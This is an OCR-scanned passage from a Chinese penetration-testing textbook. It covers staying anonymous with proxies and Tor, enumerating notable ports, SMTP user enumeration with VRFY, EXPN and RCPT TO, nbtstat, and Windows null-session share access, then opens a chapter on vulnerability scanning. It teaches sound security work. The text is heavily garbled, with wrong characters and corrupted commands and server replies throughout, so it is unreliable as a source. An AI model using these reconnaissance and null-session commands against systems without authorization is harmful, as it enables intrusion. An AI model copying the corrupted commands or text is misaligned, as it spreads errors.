同一 件 事 。 很 多 情况 下 ， 渗 透 测试 涉及 定位 和 利用 系统 中 的 弱点 ， 而 漏洞 评估 仅 关 注 于 定 
位 并 报告 弱点 。 

此 处 提 及 漏洞 扫描 器 ， 仅 仅 是 因为 本 章 介绍 的 是 其 同类 ( 即 其 他 扫描 技术 )， 所 以 才 进 
行 的 上 下 文 关 联 介绍 。 在 第 7 章 中 将 对 漏洞 扫描 器 作 详 细 介 绍 。 
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6.6 ”合用 代理 服务 售 ( 即 保持 低调 ) 


天 于 扫 摘 ， 最 后 一 件 要 介绍 的 事 承 是 “时 刻 俯首 帖 耳 ”( 即 保持 低调 )。 简 而 言 之 ， 怎 
样 才能 远离 视线 并 确保 自身 不 被 轻易 跟踪 或 发 现 ? 使 用 代理 服务 器 就 能 做 到 这 一 点 。 

代理 服务 器 是 一 个 代 蔡 发 送 方 建立 连接 的 系统 ， 可 以 将 其 视 为 两 个 主机 之 间 的 中 间 
人 。 对 于 本 书 现 在 讨论 的 情况 ， 代 理 服 务 器 扮 沉 了 扫描 方 的 代理 人 和 角色， 从 而 为 扫描 方 提 
供 了 一 定 程 度 的 匿名 性 。 代 理 服务 器 能 够 执行 一 系列 功能 ， 包 括 以 下 几 项 : 

@ 过 滤 进 出 网 络 的 流量 。 

@ 匿名 化 Web 流 量 。 

@ 充当 外 界 与 内 部 网 络 之 间 的 保护 层 。 

代理 服务 器 通 利 用 于 保持 匿名 性 。 这 对 于 进行 扫 朱 相当 有 用 ， 因 为 它们 可 以 掩 羡 或 模 
糊 扫 擂 方 的 真实 吴 份 。 警 惕 的 网 络 管理 员 在 检查 其 日 志和 系统 时 ， 看 到 的 将 是 代理 服务 器 
而 非 其 后 真正 的 扫 摘 者 。 


使 用 代理 服务 促 的 一 般 方法 

以 下 是 设置 Web 浏 唤 器 使 用 代理 服务 器 的 通 弟 方法 : 

(1) 登录 到 像 whatismyip.com 这 样 的 Web 站 点 查询 并 记 下 当前 IP， 或 者 使 用 
ipconfig 犹 取 该 信息 。 

(2) 在 google.com 上 搜索 代理 服务 器 ， 可 得 到 许多 提供 了 IP 和 相应 端口 号 清单 的 
代理 站 点。 

(3) 任意 选择 一 个 代理 服务 第， 复制 其 下 和 端口 号 。 

(4) 在 浏览 硕 中 找到 代理 设置 。 

(5) 检查 “手动 代理 配置 ”选项 ,， 填 入 第 (3) 步 记录 的 人 P 地 址 和 端口 号 。 任 何 浏 览 
第 中 都 可 以 配置 代理 。 

(6) 再 次 访问 whatismyip.com 查 看 ， 此 时 IP 地 址 应 该 已 经 发 生 改 变 ， 从 而 反映 出 
代理 服务 右 已 生效 。 在 其 他 济 览 器 中 也 能 以 类 似 的 方式 配置 代理 。 

使 用 代理 的 男 一 种 方法 是 下 载 能 够 目 动 化 配置 代理 的 插件 ， 如 用 于 Firefox 或 
Chrome 浏 览 锅 的 Foxy Proxy。 


其 他 代理 选项 在 特定 环境 下 也 许 会 很 有 用 ， 例 如 洋 瓯 路 由 器 (The Onion Router，Tor)。 

Tor 是 一 种 通信 系统 ， 可 实现 在 Intemet 上 匿名 使 用 Web 浏 览 、 即 时 消息 、IRC、SSH 或 
其 他 基于 TCP 协 议 的 应 用 程序 。Tor 的 设计 思路 是 : 使 用 一 个 经 过 若干 服务 器 的 随机 通道 
来 掩藏 行踪 ， 这 样 观察 者 就 无 法 从 任何 单 点 得 知 数据 从 何 而 来 或 到 何 处 去 。Tor 还 提供 了 
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一 个 平台 供 软 件 开 发 人 员 编 写 具 有 内 置 匿 名 性 、 安 全 性 和 隐私 特性 的 新 应 用 程序 。 
想 在 收集 目标 信息 时 使 用 Tor， 可 以 访问 Tor 的 网 站 (www.torproject.org)， 下 载 与 自己 
的 操作 系统 对 应 的 发 布 版 本 。 


6.7 进行 枚 举 


枚 举 是 从 在 扫描 期 间 发 现 的 入 口 和 信息 中 提取 有 意义 信息 的 过 程 。 因 为 在 这 一 步 中 会 
进行 更 深层 的 挖掘 ， 收 集 用 户 名 、 主 机 名 、 共 享 名 、 服 务 、 应 用 程序 数据 、 组 信息 和 其 他 
更 多 信息 ， 所 以 可 望 得 到 更 多 的 收获 。 但 此 时 ， 这 些 活动 也 会 增加 可 见 性 ， 因 而 更 需要 关 
注 被 探测 的 可 能 性 。 因 此 ， 必 须 谨慎 耐心 以 避免 被 发 现 。 

枚 举 要 求 主动 打开 到 目标 的 连接 以 提取 有 价值 的 信息 。 通 过 这 些 连接 ， 可 以 执行 用 于 
获得 更 清晰 的 环境 图 景 的 查询 和 操作 。 当 已 经 收集 到 充分 的 信息 后 ， 即 可 开展 系统 脆弱 性 
评估 。 在 此 阶段 收集 到 的 信息 一 般 可 分 为 以 下 几 类 : 

网 络 资源 和 共享 
用 户 和 组 

路 由 表 
审计 和 服务 设置 
应 用 程序 和 banner 
SNMP 和 DNS 详 情 


6.7.1 有 价值 的 新 口 


当 进 入 枚 举 阶段 时 ， 了 解 那 些 常用 的 端口 和 服务 以 及 它们 能 提供 给 攻击 者 哪些 类 型 
的 信息 是 很 有 好 处 的 。 回 顾 之 前 的 扫描 阶段 ， 当 在 系统 外 部 探索 入 口 点 时 ， 会 使 用 诸如 
nmap 或 其 他 端口 扫描 器 之 类 的 工具 探测 端口 状态 。 在 扫描 期 间 可 能 会 发 现 多 个 不 同 端 
口 ， 而 下 列 端口 应 当 密切 注意 ; 

TCP 53 ”此 端口 用 于 DNS 区 域 传 输 (DNS Zone Transfer)，DNS 系 统 通 过 该 机 制 保证 服 
务 器 持续 更 新 最 新 的 区 域 数 据 或 信息 。 

TCP 135 此 端口 用 于 客户 端 /服务 器 应 用 程序 之 间 的 通信 ， 例 如 使 电子 邮件 客户 端 
得 以 连接 到 电子 邮件 服务 器 。 

TCP 137 _ NetBIOS 名 称 服务 (NetBIOS Name Service，NBNS) 是 一 种 用 于 提供 涉及 
NetBIOS 协 议 的 名 称 解析 服务 的 机 制 。 该 服务 使 得 NetBIOS 能 够 将 各 个 系统 和 服务 的 名 称 
与 JP 地 址 关联 起 来 。 需 要 重点 注意 的 是 ， 对 许多 攻击 者 而 言 ， 该 服务 是 一 个 天 生 且 易于 攻 
击 的 目标 。 


89 


TCP 139 NetBIOS 会 话 服 务 又 称 NetBIOS 上 的 SMB( 服 务 器 消息 块 )， 用 于 管理 支持 
NetBIOS 的 客户 端 和 应 用 程序 之 间 的 连接 。NetBIOS 使 用 该 服务 建立 连接 ， 并 在 不 再 需要 
连接 时 断 开 。 

TCP 445 TCP 上 的 SMB 又 称 直 连 主机 (Direct Hosb， 是 用 于 提升 网 络 访问 效能 和 劳 
路 NetBIOS 的 服务 。 该 服务 仅 在 Windows 2000 及 更 高 版 本 上 可 用 。 

UDP 161 简单 网 络 管 理 协议 (Simple Network Management Protocol，SNMP) 是 一 种 用 
于 管理 和 监视 网 络 设备 与 主机 的 协议 。 该 协议 设计 用 于 实现 消息 传递 、 监 视 、 审 计 和 其 他 
功能 。SNMP 实 际 上 工作 在 161 和 162 两 个 端口 上 ， 其 中 监听 运行 于 161 端 口 ， 而 在 162 端 口 
上 接收 trap 报 文 。 

TCP/UDP 389 轻 量 级 目录 访问 协议 (Lightweight Directory Access Protocol，LDAP) 
用 于 许多 应 用 程序 和 目录 应 用 程序 中 ， 其 中 最 常见 的 两 种 就 是 活动 目录 (Active Directory) 
和 Exchange。LDAP 用 于 在 两 方 之 间 交 换 信 息 。 如 果 该 端口 开启 ， 就 表明 可 能 存在 活动 日 
录 和 Exchange 两 者 之 一 或 其 他 类 似 产 品 。 

TCP/UDP 3368 全 局 目录 服务 (Global Catalog Service) 与 微软 的 活动 目录 服务 相关 
联 。 该 端口 的 存在 并 开局 是 存在 活动 目录 服务 的 标志 。 

TCP 25 SMTP 用 于 通过 电子 邮件 在 网 络 上 传递 消 忆 。 

可 以 友 现 ， 以 上 列表 中 有 一 些 关 于 活动 目录 ( 它 是 微软 的 一 项 网 络 管理 产品 ) 的 项 。 对 
于 该 技术 的 介绍 远 远 超出 了 本 书 范 围 ， 但 建议 应 该 花 点 时 间 对 活动 目录 进行 基本 的 了 解 ， 
因为 它 在 企业 环境 中 是 很 常见 的 。 


6.7.2 利用 电子 邮件 ID 


该 技术 用 于 从 电子 邮件 地 址 或 ID 中 获取 用 户 名 和 域名 信息 。 观 察 任意 的 电子 邮件 地 
址 ， 可 以 看 到 它 包 含 两 个 部 分 : 在 @ 符 写 之 前 的 部 分 是 用 尸 名 ， 而 在 @ 符 号 之 后 的 部 分 则 
是 域名 。 这 种 格式 在 现下 的 环境 中 基本 已 成 为 标准 ， 其 中 用 户 名 是 通过 “名 字 . 姓 氏 ” 或 
其 东 种 变 体 生 成 的 。 


6.7.3 SMTP 榴 举 


使 用 SMTP 是 收集 目标 信息 的 一 个 有 效 方法 。 该 协议 用 于 在 收发 电子 邮件 的 服务 器 之 
间 传 递 消 息 。SMTP 是 一 个 常用 的 协议 ， 是 当前 大 多 数 电子 邮件 服务 器 与 客户 端 所 使 用 的 
标准 。 

那么 ， 如 何 使 用 该 协议 从 服务 器 上 收集 信息 ? 只 要 了 解 少数 几 个 命令 及 其 使 用 方法 ， 
该 过 程 其 实 很 简单 。 
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1. 使 用 VRFY 命 令 


验证 服务 器 上 电子 邮件 账户 是 否 存在 的 一 个 简单 方法 是 使 用 telnet 命 令 连 接 到 目标 并 
提取 信息 。VREFY 命 令 在 Telnet 协 议 中 用 于 检查 特定 的 用 户 ID 是 否 存 在 。 然 而 ， 攻 击 者 也 
可 同样 使 用 该 命令 寻找 合法 账户 用 于 攻击 ， 如 果 写 成 脚本 ， 还 能 在 短 时 间 内 提取 多 个 
账户 。 


telnet 10.0.0.1 25 (其 中 10.0.0.1 是 服务 背 IP，25 是 SMTP 的 端口 ) 
220 SerVeTrl ESMTP Sendmail 8.9.3 

HELO 

501 HELO requires domain address 

HELO XxX 

250 serverl Hello [10.0.0.1|], pleased to meet you 

VRFEY link 

250 Super-User <linklserverl> 

VREFY samus 


Do0U samus... User unknown 


在 上 文 的 步骤 中 ， 可 以 看 到 使 用 VRFY 命 令 对 用 户 账户 link 和 samus 进 行 了 验证 。 服 务 
器 响应 的 信息 表明 link 是 一 个 合法 用 户 ， 而 对 samus 返 回 的 “未 知 用 户 ” 响 应 则 表达 了 相反 
的 含义 。 


2. 使 用 EXPN 命 令 


EXPN 命 令 是 另 一 个 对 渗透 测试 者 或 攻击 者 而 言 很 有 价值 的 命令 ， 因 为 它 能 够 返回 大 
量 用 户 信息 。 该 命令 在 功能 上 与 VRFY 命 令 很 相似 ， 区 别 是 它 返回 的 不 是 单个 用 户 ， 而 是 
邮件 分 发 列表 中 的 所 有 用 户 。 


telnet 10.0.0.1 25 (其 中 10.0.0.1 为 服务 妖 IP， 25 为 SMTP 的 端口 ) 
220 SeTVerl ESMTP Sendmail 8.9.3 

HELO 

501 HELO requires domain address 

HELO Xx 

2250 serverl Hello [10.0.0.1], pleased to meet you 

EXPN link 

250 Super-User <linklmyhost> 

EXPN samus 


Do50U samus... User unknown 


3. 使 用 RCPT TO 命令 


该 命令 标识 电子 邮件 消息 的 收 件 者 。 对 于 给 定 的 消息 ， 可 以 多 次 重复 该 命令 从 而 将 单 
条 消息 发 送 给 多 个 收 件 人 。 
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telnet 10.0.0.1 25 
220 SerVveTrl ESMTP Sendmail 8.9.3 
HELO 


501 HELO requires domain address 

HELO Xx 

250 serverl Hello [10.0.0./2], pleased to meet you 

MAIL FROM: 11ink 

250 link... Sender ok 

RCPT TO:1ink 

250 link... Reclplent ok 

RCPT TV: samus 

DD50 samus... User Unknown 

尽管 通过 命令 行 执行 这 些 攻击 也 并 不 那么 困难 ， 但 还 是 有 其 他 可 选 方法 可 实现 这 些 基 
于 SMTP 的 攻击 ， 例 如 NetScanTools Pro。 


6.7.4 ”党 被 利用 的 服务 


对 Windows 操 作 系 统 的 关注 在 用 户 和 攻击 者 当中 都 很 普遍 ， 这 是 有 多 种 原因 的 ， 但 本 
书 在 此 只 聚焦 于 攻击 者 及 其 利用 的 目标 。 

Windows 操 作 系 统 长 期 以 来 都 以 默认 运行 多 个 服务 而 著称 ， 其 中 每 个 服务 都 会 给 防御 
者 带 来 一 堆 厂 烦 ， 而 给 攻击 者 提供 一 个 充满 机 会 的 目标 。 系 统 中 的 每 个 服务 都 用 于 为 系 
统 提供 额外 的 特性 和 能 力 ， 例 如 文件 共享 、 域 名 解析 、 网 络 管理 等 。 总 之 ， 默 认 情 况 下 
Windows 可 运行 大 约 30 个 服务 ， 其 中 还 不 包 插 独立 应 用 程序 可 能 安装 的 服务 。 有 些 服务 还 
可 能 有 多 个 实例 ， 使 安全 管理 员 更 加 难以 识别 。 

NetBIOS 是 Windows 系 统 中 最 易 受 攻击 的 服务 之 一 ， 下 文 将 对 其 进行 详细 分 析 。 
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攻 入 Windows 系 统 获取 立足 点 的 起 始 步 又 之 一 是 利用 NetBIOS 的 API( 应 用 程序 编程 接 
口 )。 该 服务 最 初 只 是 用 于 协助 访问 局 域 网 资源 。 它 设计 为 使 用 16 个 字符 的 名 称 ， 其 中 前 
15 个 字符 用 于 标识 计算 机 ， 而 最 后 一 个 字符 代表 该 计算 机 自身 上 面 的 服务 或 项 目 。 已 经 证 
明 ，NetBIOS 对 某 些 人 而 言 是 福音 ， 而 对 另 一 些 人 则 是 诅 允 。 

深入 讨论 之 前 ， 在 此 先 人 简短 介绍 一 下 NetBIOS 的 背景 。NetBIOS 是 在 20 世 纪 80 年 代 早 
期 出 现 的 一 种 网 络 服务 ， 是 一 种 在 早期 网 络 中 导航 并 为 其 中 设备 提供 通信 手段 的 方法 。 该 
技术 最 初 是 由 Syntek 开 发 的 ， 后 来 被 IBM 和 采用 ， 用 于 其 令 牌 环 (Token Ring) 网 络 。 由 于 IBM 
的 支持 以 及 此 后 该 技术 向 PC 领域 的 移植 ，NetBIOS 成 为 一 种 跨越 多 个 操作 系统 和 平台 的 
标准 。 
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大 约 从 2000 年 开始 ， 由 于 种 种 原因 NetBIOS 迅 速 失去 了 人 们 的 青睐 ， 并 已 成 为 一 种 遗 
留 协议 。 在 Windows 世 界 中 ，Windows2000 以 前 的 所 有 操作 系统 版 本 曾 使 用 NetBIOS 进 行 
域名 解析 。 而 在 Windows 2000 中 ， 其 主要 的 域名 解析 方法 变 成 了 DNS， 它 迅速 取代 了 过 时 
的 NetBIOS。 此 外 ，NetBIOS 协 议 迅速 边缘 化 的 原因 在 于 如 果 不 依赖 其 他 技术 (如 TCP/IP 等 ) 
就 无 法 进行 路 由 。 

如 果 使 用 了 正确 的 工具 和 技术 ， 攻 击 者 也 可 以 从 NetBIOS 中 获取 大 量 信 息 。 使 用 上 述 
扫描 技术 ， 攻 击 者 可 以 查找 端口 139 的 存在 并 确定 端口 是 否 打 开 。 一 旦 确认 该 端口 可 接受 
连接 ， 下 一 步 自 然 就 是 查 明 该 连接 是 否 可 提取 信息 ， 例 如 用 户 名 和 组 信息 。 在 实践 中 ， 对 
于 试图 确定 计算 机 中 可 用 内 容 的 远程 系统 而 言 ， 这 种 获取 系统 信息 的 能 力 很 有 和 好处， 但 攻 
击 者 也 能 利用 同样 的 信息 确定 努力 目标 。 

在 多 种 可 与 NetBIOS 协 同 工 作 的 工具 中 有 一 个 称 为 nbtstat 的 工具 ， 其 优点 是 内 置 在 
Windows 中 。nbtstat 能 显示 本 地 和 远程 系统 的 信息 ， 包 括 名 称 列 表 、 协 议 统 计 信 息 以 及 
其 他 信息 。 该 工具 专门 设计 用 于 解决 由 NetBIOS 服 务 导 致 的 名 称 解 析 问 题 。 在 正常 操作 
中 ，Windows 中 有 一 个 名 为 “TCP/IP 上 的 NetBIOS(NetBIOS over TCP/IP)” 的 服务 ， 可 将 
NetBIOS 名 称 解 析 为 IP 地 址 。nbtstat 就 是 一 个 设计 用 于 查找 定位 该 服务 的 问题 的 工具 。 


练习 6.S: 使 用 nbtstat 工 具 
按 下 列 方式 运行 nbtstat 命 令 ， 返 回 远程 系统 中 的 名 称 列表 : 
nbtstat .exe -人 < 远程 系统 的 NetBIOS 名 称 > 
-A 选 项 可 用 于 获取 一 个 系统 解析 的 NetBIOS 名 称 和 地 址 的 列表 。 如 果 目 标 系 统 的 
IP 地 址 为 192.168.1.10， 则 使 用 此 选项 的 命令 行将 如 下 所 示 : 


nbtstat -A 192.168.1.10 


nbtstat 命 令 的 功能 远 不 止 这 两 种 ， 以 下 列 出 的 只 是 nbtstat 命 令 可 用 的 部 分 选项 : 

-a( 适 配器 状态 ) 返回 指定 名 称 计算 机 的 NetBIOS 名 称 表 及 其 地 址 卡 的 介质 访问 控制 
(MAC) 地 址 。 

-人 (适配器 状态 ) 当 给 定 目标 的 人 地 址 时 ， 列 出 与 -a 相同 的 信息 。 

-Cc( 缓 存 ) 列 出 NetBIOS 名 称 缓存 的 内 容 。 

-n( 名 称 ) ”显示 NetBIOS 应 用 程序 (如 服务 器 和 重 定 同 器 ) 的 本 地 注册 名 。 

-Tr( 已 解析 ) 显示 由 广播 或 Windows Internet 名 称 服务 (Windows Intemet Name Service， 
WINS) 服 务 器 解析 出 来 的 所 有 名 称 的 计数 。 

-S( 会 话 ) 列 出 NetBIOS 会 话 列表 ， 并 将 目的 IP 地 址 转换 为 计算 机 的 NetBIOS 名 称 。 

-S( 会 话 ) 列 出 当前 NetBIOS 的 会 话 和 状态 及 其 IP 地 址 。 
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6.7.6 ” 空 会 话 


通过 NetBIOS 启 用 的 另 一 个 功能 和 洪 在 缺陷 是 空 会 话 。 该 功能 可 令 客 户 端 或 连接 的 端 
点 通过 网 络 访问 确定 类 型 的 信息 。 空 会 话 并 非 什 么 新 事物 ， 实 际 上 它 成 为 Windows 操 作 系 
统 的 一 部 分 己 有 相当 长 的 时 间 ， 用 于 完全 合法 的 用 途 ， 但 问题 是 它们 也 是 潜在 的 滥用 源 
头 。 下 文 很 快 会 介绍 ， 衬 会话 可 能 泄露 大 量 信息 。 

在 接 入 Windows 系 统 而 未 提供 凭据 (用 户 名 和 密码 ) 时 ， 就 会 产生 一 个 空 会 话 。 这 种 会 
话 只 能 回 一 个 被 称 为 进程 间 通 信 (IPC) 的 特殊 位 置 用 起 ， 该 位 置 是 一 个 用 于 管理 的 共享 。 
在 正 弟 情况 下 ， 至 会 话 设计 用 于 在 网 络 系统 间 建 立 连 接 ， 以 实现 系统 之 间 的 进程 枚 举 和 共 
享 。 可 能 在 此 过 程 中 获得 的 信息 包括 : 

@ 用 户 和 组 列表 

@ 计算 机 列表 

@ 共 译 列表 

@ 用 户 和 主机 SID 

空 会 话 允 许 使 用 一 个 称 为 NULL 用 户 的 特殊 账户 访问 系统 ， 该 特殊 账户 可 用 于 显示 与 
系统 共享 或 用 户 账户 相关 的 信息 ， 而 不 需要 用 户 名 或 密码 。 

利用 空 会 话 是 一 个 简单 的 任务 ， 只 需要 灾 灾 几 条 命令 。 例 如 ， 假 设 某 计 算 机 主机 名 是 
samus， 这 就 意味 着 可 以 使 用 以 下 命令 连接 系统 ， 其 中 主机 名 是 目标 系统 的 IP 地 址 或 
名 称 : 

net use \\samus\ipc$ "/user:" 


要 查看 特定 系统 上 可 用 的 共享 资源 ， 在 运行 命令 连接 到 目标 系统 上 的 $ipc 共 享 之 后 ， 
运行 以 下 命令 : 

net view \‘\samus 

这 将 显示 系统 上 的 共享 列表 。 当 然 ， 如 有 果 系 统 中 没有 其 他 共享 资源 可 用 ， 则 不 会 显示 
任何 内 容 。 

攻击 者 获取 该 共享 列表 后 ， 下 一 步 即 可 连接 到 某 个 共享 并 查看 其 中 存在 的 数据 。 使 用 
如 下 的 net use 命 令 即 可 简单 地 实现 : 


net use ss: ‘\\samus\ (shared folder name) 


现在 应 该 可 以 浏览 映射 的 S: 驱 动 器 ， 查 看 共享 文件 夹 中 的 内 容 。 


6.8 本草 小 绪 


扫描 阶段 之 后 是 枚 举 阶段 ， 在 这 个 阶段 应 尽 可 能 多 地 发 掘 各 个 系统 的 信息 。 枚 举 是 一 
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种 主动 措施 ， 用 于 获取 用 户 名 、 共 享 数据 、 组 信息 以 及 其 他 多 种 信息 等 细节 。 通 过 使 用 枚 
举 技术 ， 可 发 现 系统 中 的 用 户 、 共 享 、 组 、 打 印 机 、 计 算 机 以 及 其 他 信息 ， 用 于 后 续 
攻击 。 


6.9 ”习题 


. 为 何 要 将 网 络 数据 包 分 段 ? 
. 何 为 套 接 字 ? 

. ping 扫 摘 的 目的 为 何 ? 
端口 扫描 的 目的 为 何 ? 

. 枚 举 用 于 获取 何 种 信息 ? 
. 为 何 要 执行 banner 抓 取 ? 

. 三 次 握手 有 何 功 能 ? 

. TCP 和 UDP 有 何 区 别 ? 


第 7 章 


实施 漏洞 扫描 


漏洞 是 指 存 在 于 主机 、 系 统 或 环境 中 的 弱点 与 缺乏 防护 之 处 。 对 于 威胁 而 言 ， 汤 洞 的 
存在 意味 着 潜在 的 突破 点 或 目标 。 定 位 和 识别 系统 中 的 漏洞 是 保护 系统 的 重要 环节 ， 但 不 
i 

那么 ， 如 何 发 现 环 境 中 存在 的 所 有 漏洞 (尤其 是 在 技术 日 趋 复 杂 的 背景 下 )? 有 许多 技 
术 手 段 可 以 提供 帮助 ; 有 些 是 手动 的 或 基于 脚本 的 ， 其 中 很 多 本 书 已 经 介绍 过 了 ， 还 有 一 
些 是 自动 化 工具 (例如 漏洞 扫描 器 )。 

泥 洞 扫描 器 用 于 识别 操作 系统 和 应 用 程序 中 的 问题 和 “漏洞 ”， 其 工作 原理 是 通过 检 
查 编码 、 端 口 、 变 量 、banner 信 息 和 许多 其 他 可 能 存在 隐 吓 的 领域 来 寻找 问题 。 漏 洞 扫 描 
器 的 用 途 是 让 合法 用 户 (包括 渗透 测试 者 ) 使 用 其 找 出 是 否 存 在 被 成 功 攻 陷 的 可 能 性 ， 以 及 
为 缓解 这 种 可 能 性 所 需 的 减 小 或 者 消除 威胁 区 域 的 修复 措施 。 尽 管 漏洞 扫描 妖 通 常用 于 检 
查 应 用 软件 ， 但 它们 也 可 以 检查 整个 操作 环境 ,包括 网 络 和 虚拟 机 。 


本 章 将 学 习 : 
理解 漏洞 扫描 的 目的 
了 解 尘 洞 扫描 的 局 限 
掌握 漏洞 扫描 的 过 得 
怎样 选择 扫描 类 型 
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7.1 漏洞 扫描 简介 


漏洞 扫描 是 一 套 流 程 ， 可 作为 渗透 测试 的 一 部 分 ， 也 可 以 完全 独立 执行 。 此 类 扫描 
的 目的 在 于 定位 和 识别 目标 中 的 漏洞， 并 癌 扫 摘 发 起 者 提供 相关 信息 。 如 果 正 确 地 定期 进 
行 ， 漏 洞 扫 摘 能 够 提供 关于 组 织 设施 安全 状况 的 宇 吐 信息 ， 包 括 其 技术 管理 策略 。 

许多 公司 选择 使 用 漏洞 扫描 器 ， 是 因为 它们 可 以 很 容易 地 识别 多 种 第 见 的 安全 问题 。 
其 工作 原理 是 通过 检查 目标 区 域 的 编码 、 端 口 及 许多 其 他 方面 ， 以 揭示 攻击 者 可 能 利用 的 
任何 问题 。 许 多 合法 用 户 使 用 漏 调 扫描 器 查找 是 否 有 被 攻陷 的 可 能 性 ， 以 及 需要 进行 何 种 
工作 以 降低 各 种 威胁 。 同 时 ， 黑 客 则 使 用 这 些 扫 拉 器 来 发 现 攻 击 的 目标 。 虽 然 漏 洞 扫描 器 
往往 最 意 用 于 程序 ， 但 它们 也 可 以 检查 整个 计算 机 、 网 络 和 虚拟 机 。 
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黑客 有 许多 潜入 计算 机 的 途径 ;他们 可 以 利用 有 缺 陷 的 代码 、 开 放 端 口 或 是 容易 获取 
用 户 访问 权限 的 程序 。 公 司 使 用 漏洞 扫描 器 以 尽量 降低 被 黑客 攻击 的 可 能 性 。 用 户 可 以 指 
定 一 个 目标 区 域 ， 让 扫 拉 程序 专门 针对 计算 机 的 这 一 部 分 进行 扫描 ， 通 过 对 该 区 域 的 彻底 
检查 来 发 现 问题 。 有 些 程序 可 以 自动 修复 小 错误 ， 但 大 多 数 只 是 报告 发 现 的 问题 。 

漏洞 扫描 器 软件 的 主要 用 户 群 体 是 合法 的 ， 其 中 大 多 是 企业 用 户 。 初 级 用 户 往 往 缺 
之 正确 修复 问题 的 知识 ， 因 此 漏洞 扫 插 融通 党 并 非 是 为 他 们 设计 的 。 漏 洞 扫 描 右 更 多 用 于 
企业 和 大 型 网 络 ， 对 于 这 些 用 户 ， 漏 洞 可 能 导致 直接 的 经 济 损失 或 代价 惨重 的 商业 机 密 沪 
露 。 渗 透 测 试 者 往往 能 从 这 些 工 具 中 获 荔 ， 因 为 利用 这 些 工 具 ， 他 们 可 以 在 工作 中 发 现 可 
能 被 利用 的 漏洞 并 为 客户 提供 信息 。 漏 洞 扫 搬 费 最 第 用 于 定制 程序 或 Web 应 用 程序 (涉及 多 
人 同时 工作 的 程序 )， 因 为 它们 往往 会 出 现 安全 威 肋 。 漏 洞 扫 摘 器 也 适用 于 整个 计算 机 、 
网 络 、 端 口 、 数 据 库 和 虚拟 机 。 有 些 扫描 器 可 用 于 扫描 多 种 不 同 的 目标 区 域 ， 而 有 些 扫描 
器 只 能 够 检查 计算 机 的 一 个 方面 。 


7.2 ”认识 漏洞 打 描 的 局 限 


长 期 以 来 ， 漏 洞 扫描 一 直 是 安全 专业 人 员 的 工具 箱 中 的 老牌 常备 品 。 然 而 ， 尽 管 是 一 
个 有 价值 的 工具 并 将 继续 作为 安全 专业 人 员工 具 箱 的 重要 组 成 部 分 ， 漏 洞 扫描 也 有 其 局 限 
性 一 正确 理解 这 一 点 才能 恰当 地 使 用 该 技术 ， 发 挥 其 最 大 作用 。 需 要 牢记 的 是 ， 漏 洞 是 
一 个 不 断 发 展 变化 的 问题 ， 可 以 得 到 缓解 控制 ， 但 还 需要 持续 进行 重新 评估 ， 以 确保 任何 
新 问题 都 能 得 到 及 时 应 对 (至 少 要 注意 保持 对 网 络 上 当前 安全 问题 的 跟踪 )。 对 于 这 些 扫描 
器 ， 另 一 个 应 当 记 住 的 要 点 是 :使 用 这 些 工具 进行 扫描 的 IT 管理 员 或 安全 专家 不 应 仅 由 于 
没有 发 现 其 关注 的 问题 就 产生 一 种 虚假 的 安全 感 。 

漏洞 扫描 器 以 不 同 的 形式 出 现 ， 每 一 种 都 能 针对 某 个 目标 系统 执行 一 种 特有 类 型 的 扫 
描 。 某 些 低 端 扫描 器 只 提供 对 系统 配置 (包括 补丁 程序 和 软件 版 本 信息 ) 进 行 检查 的 能 力 ; 
而 高 端 扫描 器 则 可 能 具备 许多 强大 的 特性 ， 如 高 级 报告 、 分 析 功 能 和 其 他 有 用 的 能 力 。 

无 论 其 本 身 特性 和 整体 功能 如 何 ， 大 多 数 扫描 器 都 采用 类 似 反 恶意 软件 工具 包 的 模 
型 。 在 大 多 数 情况 下 ， 扫 描 器 依赖 于 一 个 关于 已 知 漏洞 的 数据 库 ， 而 该 数据 库 需要 通过 从 
供应 商 网 站 下 载 新 版 本 实现 定期 更 新 。 就 像 疫苗 的 强化 注射 一 样 ， 该 数据 库 必 须 定期 更 
新 ， 否 则 它 很 快 将 无 法 检测 新 出 现 的 威胁 ， 从 而 增加 未 检测 到 的 漏洞 遭 到 利用 的 安全 风 
险 。 实 际 上 ， 如 果 不 定 期 更 新 扫描 器 的 话 ， 那 么 一 段 时 间 后 它 就 将 变 得 毫 无 价值 。 

关于 扫描 器 ， 还 有 一 个 更 大 的 问题 就 是 ， 即 使 应 用 了 全 部 的 当前 更 新 和 其 他 措施 ， 确 
保 了 软件 的 及 时 更 新 升级 ， 扫 描 器 还 可 能 “过 于 自信 ”。 一 些 使 用 者 相信 扫描 器 提供 的 
报告 列 出 了 环境 中 的 所 有 漏洞 ， 因 此 基于 该 报告 进行 审查 和 处 理 就 意味 着 万 事 大 吉 一 一 然 
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而 事实 绝 非 如 此 。 实 际 上 ， 漏 洞 扫 描 右 只 会 报告 它 有 能 力 检测 的 那些 项 目 ， 因 而 仍然 存在 
许多 潜在 问题 被 遗漏 的 可 能 性 。 这 种 情况 有 扣 类 似 于 认为 环绕 着 一 座 建 筑 物 检 查 一 过 问题 
就 能 发 现 其 所 有 潜在 的 漏洞 一 一 事实 当然 不 是 这 样 ， 很 容易 忽略 条 些 东 西 。 

最 后 ， 另 一 个 有 关 漏 洞 扫描 器 的 易于 产生 的 误解 是 : 只 有 在 新 闻 中 或 其 他 消息 来 源 
上 报道 了 安全 问题 时 ， 才 需要 使 用 它们 。 而 实际 上 ， 扫 摘 必 须 定期 执行 ， 以 正确 地 发 现 问 
题 ， 并 确保 当前 采取 的 安全 措施 工作 正常 ， 能 保持 环境 正 第 、 安 全 地 运行 。 根 据 公司 需要 
遵从 的 具体 合 规 性 要 求 ， 可 能 要 依照 固定 的 时 间 表 执行 漏洞 扫描 并 进行 验证 。 例 如 ， 文 付 
卡 行业 数据 安全 标准 (PCI DSS) 要 求 执行 周期 性 的 漏洞 扫描 ， 因 此 任何 存储 、 处 理 或 传输 
信用 卡 数 据 的 组 织 都 要 执行 漏洞 扫描 。 


7.3 ”漏洞 扫描 流程 概述 


漏洞 扫 描 通 钊 作为 帮助 组 织 识别 其 网 络 和 计算 设备 漏洞 的 众多 手段 之 一 实施 。 扫 摘 结 
朱 能 够 帮助 管理 者 驶 他 们 的 网 络 及 其 上 连接 设备 的 安全 性 做 出 有 根据 的 决定 。 漏 洞 扫 摘 的 
规模 可 大 可 小 ， 取 决 于 所 需 评 估 的 资产 和 系统 。 

虽然 有 许多 工具 可 以 深入 探 寒 系统 漏洞 ， 但 并 非 所 有 的 扫描 工具 都 上 共有 相同 的 特性 
集 。 每 个 扫描 工具 都 可 能 包含 (也 可 能 不 包含 ) 其 他 工具 能 够 评估 的 漏洞 列表 。 因 此 ， 组 织 
